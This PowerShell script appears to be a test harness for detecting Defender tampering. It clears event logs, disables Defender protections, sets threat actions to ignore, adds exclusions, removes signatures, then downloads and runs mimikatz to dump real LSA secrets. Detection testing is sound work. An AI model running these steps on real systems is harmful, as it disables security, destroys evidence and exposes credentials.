<#
  Defender tamper / detection test harness (Group Policy registry variant).

  Flow, as written below:
    1. Clear the Defender, Application, System and Security event logs.
    2. Write a series of Defender policy values under
       HKLM\SOFTWARE\Policies\Microsoft\Windows Defender, running
       `gpupdate /force` and sleeping 60 s after each step (1.1 - 1.8).
    3. Remove the local security-intelligence definitions (1.9) and then try
       to pull a signature update again.
    4. Run two detection probes: an EICAR file dropped into two folders (one of
       them, C:\AVTest, is excluded in 1.6) and a downloaded mimikatz binary.
    5. Export the same event logs to C:\ for analysis.

  Every step in (2) is a plain registry write under the Defender Policies key,
  so the exported logs are exactly the material a detection rule for
  "Defender tampering via policy keys" has to work with. The script needs an
  elevated session (HKLM writes, clearing/exporting the Security log). Step 1
  destroys the host's existing log history and the mimikatz step dumps the
  host's real LSA secrets - neither is a simulation.
#>

# Group Policy
$EventLogs = @(
    "Microsoft-Windows-Windows Defender/Operational"
    "Microsoft-Windows-Windows Defender/WHC"
    "Application"
    "System"
    "Security"
)
# Clear each log so the export at the end contains only what this run generated.
# Clearing is itself logged (typically Security 1102 / System 104) and is a classic
# anti-forensics indicator, so expect those to be the first events in the export.
foreach ($EventLogName in $EventLogs) {
    & wevtutil cl "$EventLogName"
    Write-Output "$(Get-Date -Format "yyyy-MM-dd HH:mm:ss") Eventlog `"$EventLogName`" was cleared"
}
Start-Sleep 60
# Captured once here and reused in the export file names at the end of the run.
$StartDate = $(Get-Date -Format "yyyy-MM-dd-HHmmss")

# Start configuration changes
Write-Output "$(Get-Date -Format "yyyy-MM-dd HH:mm:ss") Start configuration changes"

# 1.1 Disable virus and threat protection
# Pattern used by every step below: New-Item creates the policy subkey
# (-ErrorAction 0 = SilentlyContinue, so "already exists" is ignored), New-ItemProperty
# sets the policy value, then gpupdate /force plus a 60 s wait gives the policy engine
# time to apply it before the next step - keeping the steps separable in the logs.
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name 'Real-Time Protection' -Force -ErrorAction 0
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name DisableIOAVProtection -Value 1 -PropertyType DWord -Force
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name 'Scan' -Force -ErrorAction 0
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" -Name DisableEmailScanning -Value 1 -PropertyType DWord -Force
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name 'Spynet' -Force -ErrorAction 0
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" -Name DisableBlockAtFirstSeen -Value 1 -PropertyType DWord -Force
# Apply configuration changes
gpupdate /force
Start-Sleep 60

# 1.2 Disable real-time protection
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name 'Real-Time Protection' -Force -ErrorAction 0
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name DisableRealtimeMonitoring -Value 1 -PropertyType DWord -Force
# Apply configuration changes
gpupdate /force
Start-Sleep 60

# 1.3 Turning off behavior monitoring
# NOTE(review): unlike 1.1/1.2 this writes the value into a subkey named after the
# value itself rather than into an existing policy subkey. Confirm from the exported
# Defender log that this step actually changed a setting before counting it as covered.
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name 'DisableBehaviorMonitoring' -Force -ErrorAction 0
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\DisableBehaviorMonitoring" -Name DisableBehaviorMonitoring -Value 1 -PropertyType DWord -Force
# Apply configuration changes
gpupdate /force
Start-Sleep 60

# 1.4 Disable cloud-delivered protection
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name 'Spynet' -Force -ErrorAction 0
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" -Name SpynetReporting -Value 0 -PropertyType DWord -Force
# Apply configuration changes
gpupdate /force
Start-Sleep 60

# 1.5 Disable signature updates
# Note the value here is an empty String, not a DWord like the other steps.
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name 'Signature Updates' -Force -ErrorAction 0
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" -Name SharedSignatureRoot -Value "" -PropertyType String -Force
# Apply configuration changes
gpupdate /force
Start-Sleep 60

# 1.6 Add exclusions path*
# Excluded folder C:\AVTest is reused later: the EICAR probe is dropped both here
# (presumably the "excluded" control) and in C:\AVTest2 (not excluded), and the
# mimikatz download/execution happens inside this folder.
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" -Name 'Paths' -Force -ErrorAction 0
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" -Name Exclusions_Paths -Value 1 -PropertyType DWord -Force
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" -Name "C:\AVTest" -Value 0 -PropertyType String -Force
# Apply configuration changes
gpupdate /force
Start-Sleep 60

# 1.7 Disable automatic actions on detected threats
# NOTE(review): these two paths are written as "HKLM:SOFTWARE\..." (no leading
# backslash, i.e. drive-relative) while the rest of the file uses "HKLM:\SOFTWARE\...";
# they should land on the same key as long as the current location on HKLM: is its
# root, but the inconsistency is worth verifying in the exported registry events.
New-Item -Path "HKLM:SOFTWARE\Policies\Microsoft\Windows Defender\Threats\" -Name 'ThreatSeverityDefaultAction' -Force -ErrorAction 0
New-ItemProperty -Path "HKLM:SOFTWARE\Policies\Microsoft\Windows Defender\Threats\" -Name 'Threats_ThreatSeverityDefaultAction' -Value 1 -PropertyType DWord -Force
# One value per severity level (1, 2, 4, 5), each set to the same default action.
1,2,4,5 | ForEach-Object {
    # 6 = Ignore
    New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" -Name $_ -Value 6 -PropertyType String -Force
}
# Apply configuration changes
gpupdate /force
Start-Sleep 60

# 1.8 Change default action for specific malware*
# Same mechanism as 1.7 but keyed by threat ID instead of severity; the two IDs
# below are the author's choice and are not otherwise explained in this file.
New-Item -Path "HKLM:SOFTWARE\Policies\Microsoft\Windows Defender\Threats\" -Name 'ThreatIdDefaultAction' -Force -ErrorAction 0
New-ItemProperty -Path "HKLM:SOFTWARE\Policies\Microsoft\Windows Defender\Threats\" -Name 'Threats_ThreatIdDefaultAction' -Value 1 -PropertyType DWord -Force
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" -Name "2147519003" -Value 6 -PropertyType String -Force
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" -Name "2147717805" -Value 6 -PropertyType String -Force
# Apply configuration changes
gpupdate /force
Start-Sleep 60

# 1.9 Removing security intelligence updates
# Not a policy write: this calls the Defender command-line tool directly to drop the
# locally installed definitions, so it shows up differently in the logs than 1.1-1.8.
& "$ENV:ProgramFiles\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Start-Sleep 60

# End of configuration
Write-Output "$(Get-Date -Format "yyyy-MM-dd HH:mm:ss") Configuration done."

# Try to update signatures (after 1.5 and 1.9 this is expected to fail or be a no-op;
# -Verbose keeps the outcome visible on the console).
Update-MpSignature -Verbose
Start-Sleep 60

# Test detection of Eicar
# Single quotes are essential: the test string contains `$EICAR-...` and `$H+H*`,
# which double quotes would try to expand.
# NOTE(review): in Windows PowerShell 5.1 the `>` redirection writes UTF-16 LE with a
# BOM, while the EICAR signature is defined over the plain ASCII bytes. If the Defender
# log shows no detection (typically 1116/1117) for the non-excluded C:\AVTest2\,
# check the file's encoding before concluding that detection is off. The Get-Content
# afterwards shows whether the file survived the scan (i.e. was not remediated).
$Paths = @("C:\AVTest\", "C:\AVTest2\")
foreach ($Path in $Paths) {
    New-Item -Type Directory -Path $Path -EA 0
    Set-Location $Path
    Write-Output 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*' > eicartest.file
    Start-MpScan -ScanType CustomScan -ScanPath $Path
    Get-Content .\eicartest.file
    Start-Sleep 60
}

# Test detection of mimikatz
# Runs inside the folder excluded in 1.6, so the download, extraction and execution
# all happen within the exclusion.
cd "C:\AVTest\"
# Suppress the Invoke-WebRequest progress bar (also avoids its slowdown on large files).
$ProgressPreference = "SilentlyContinue"
# Force TLS 1.2 for the GitHub download on hosts whose .NET default is older.
[Net.ServicePointManager]::SecurityProtocol = ([Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls12)
Invoke-WebRequest -Uri "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210810-2/mimikatz_trunk.zip" -OutFile "mimikatz.zip"
# NOTE(review): the archive is extracted and executed without any integrity check.
# Pin the expected SHA-256 of the release asset (<EXPECTED_SHA256 placeholder>) and
# compare it with (Get-FileHash mimikatz.zip).Hash before Expand-Archive, so the test
# demonstrably runs the binary it claims to and a tampered download aborts the run.
# Unblock-File removes the Mark-of-the-Web zone information from the download.
Unblock-File "mimikatz.zip"
Expand-Archive -Path "mimikatz.zip" -DestinationPath .

# Execute mimikatz
# This is a real lsadump::lsa against the host's LSA, not a simulator; output goes
# to the console and is not captured by this script.
.\x64\mimikatz.exe "lsadump::lsa" "exit"

# Scan folder
Start-MpScan -ScanType CustomScan -ScanPath "C:\AVTest\"
Start-Sleep 60

# Export event logs
# "/" is not valid in a file name, hence the -replace for channel names such as
# "Microsoft-Windows-Windows Defender/Operational". Host name plus $StartDate keep
# repeated runs from overwriting each other.
foreach ($EventLogName in $EventLogs) {
    $FileName = $EventLogName -replace "/", '-'
    & wevtutil epl "$EventLogName" "C:\$($ENV:COMPUTERNAME)_$($FileName)-$($StartDate).evtx"
    Write-Output "$(Get-Date -Format "yyyy-MM-dd HH:mm:ss") Eventlog `"$EventLogName`" was exported to `"C:\$($ENV:COMPUTERNAME)_$($FileName)-$($StartDate).evtx`""
}